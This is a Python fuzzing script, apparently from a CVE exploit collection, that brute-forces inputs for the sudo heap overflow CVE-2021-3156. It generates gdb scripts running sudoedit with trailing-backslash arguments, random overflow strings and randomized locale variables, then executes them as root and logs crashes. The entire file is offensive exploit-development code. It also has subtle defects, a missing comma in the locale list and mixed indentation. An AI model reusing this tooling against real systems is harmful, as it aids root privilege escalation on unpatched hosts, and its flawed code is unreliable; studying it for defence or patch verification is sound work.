0day/00-CVE_EXP/CVE-2021-3156/fuzz.py

#!/usr/bin/env python3

# bruteforcer to identify attack vectors for CVE-2021-3156

import os
import random

#MAX_U_ARG = 100
#MAX_BOF_ = 500
ARGV_OPT_ = [' -u lockedbyte ', ' -A ', ' -n ', '', ' -u fake ']
GDB_CMD_F = 'run.cmd'

LOG_F_N = 'log.txt.%n%'
LOG_BAK_F = 'bak.txt.'

sz_a = [0x20, 0x30, 0x40,0x50, 0x60, 0x70, 0x80, 0x90, 0xa0, 0xb0,
              0xd0, 0xe0,0x110, 0x120, 0x130, 0x1a0, 0x1c0, 0x1d0, 0x1e0, 
              0x1f0, 0x210, 0x290, 0x310, 0x410, 0x4c0, 0x4d0, 0x540, 0x650, 
              0x660, 0x1010, 0x2da0, 0x4010]

'''
declare -x LC_ADDRESS="C.UTF-8"
declare -x LC_IDENTIFICATION="C.UTF-8"
declare -x LC_MEASUREMENT="C.UTF-8"
declare -x LC_MONETARY="C.UTF-8"
declare -x LC_NAME="C.UTF-8"
declare -x LC_NUMERIC="C.UTF-8"
declare -x LC_PAPER="C.UTF-8"
declare -x LC_TELEPHONE="C.UTF-8"
declare -x LC_TIME="C.UTF-8"
declare -x LC_MESSAGES="C.UTF-8"
'''

LC_ENV = ['LC_ADDRESS', 'LC_IDENTIFICATION', 'LC_MEASUREMENT', 'LC_MONETARY'
	'LC_NAME', 'LC_NUMERIC', 'LC_PAPER', 'LC_TELEPHONE', 'LC_TIME', 
	'LC_MESSAGES', 'LC_CTYPE','LC_ALL', 'LC_COLLATE']

stat_val = 'C.UTF-8'

def sz_to_pl(n):
	return 'A'*(n-0x18)

def genrnd(n, t = 'all'):
    if(t == 'all'):
        alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
        alphabet += alphabet.lower()
        alphabet += '1234567890'
        #alphabet += '!|@#$%&/()=?+[]{}-_.:,;<>\\'
    else:
        alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
        alphabet += alphabet.lower()
        
    out = 'A'
    n -= 1
    for _ in range(n):
        out += alphabet[random.randint(0, len(alphabet)-1)]
    return out

def get_env_stuff():
    already = []
    append_r = ''
    n_vars = random.randint(0, len(LC_ENV))
    for _ in range(n_vars):
        while(True):
            idx = random.randint(0, len(LC_ENV)-1)
            if(idx not in already):
                break
        already.append(idx)
        which = LC_ENV[idx]
        n_x = random.randint(1, 100)
        add_bl = random.randint(1, 10)
        if(add_bl == 7):
            append_r += 'set env ' + which + ' ' + stat_val + '@' + genrnd(n_x) + '\n'
        else:
            append_r += 'set env ' + which + ' ' + stat_val + '@' + genrnd(n_x) + '\n'
        add_bl_x = random.randint(1, 10)
        if(add_bl_x > 7):
            for __ in range(random.randint(1,5)):
                append_r += 'set env ' + genrnd(random.randint(1,50)) + ' ' + genrnd(random.randint(1,300)) + '\n' # increment o decrement it each round NAME / VALUE
    return append_r
    
def perform_init(user_n, bof_n, opt, n, env_stuff):

    print('[*] Round #' + str(n))
    
    out_f = LOG_F_N.replace('%n%', str(n))
    
    cx = random.randint(1, 10)

    chk_bof = 'B'*bof_n

    if(cx > 6):
        chk_bof += ' '
    	xw = random.randint(2, 7)
    	xw = xw-1
    	for ___ in range(xw):
            chk_bof += 'B'*random.randint(1, 200) + ' ' 
    
    chk_u = user_n
    
    f_gdb_c = '''file /usr/local/bin/sudoedit
'''+env_stuff+'''
r ''' + opt + ''' -s \'''' + chk_u + '''\\' ''' + chk_bof + '''
'''
    f = open(GDB_CMD_F, 'w')
    f.write(f_gdb_c)
    f.close()
    
    os.system('sudo gdb < ' + GDB_CMD_F + ' > ' + out_f + ' 2>&1')

    f2 = open(LOG_BAK_F + str(n), 'w')
    f2.write(f_gdb_c)
    f2.close()

    return

def main():
    print('[*] Bruteforcing...')
    nx = 0
    while True:
        x = random.randint(5, random.randint(10, 200)) # BOF -- increment this each round
        #i = random.randint(1, random.randint(10, 200)) # USER
        i = sz_to_pl(sz_a[random.randint(0, len(sz_a)-1)])
        n = ARGV_OPT_[random.randint(0, len(ARGV_OPT_)-1)]
        env_stuff = get_env_stuff()
        perform_init(i,x,n,nx,env_stuff)
        nx += 1

main()
print('[+] Bruteforce completed!')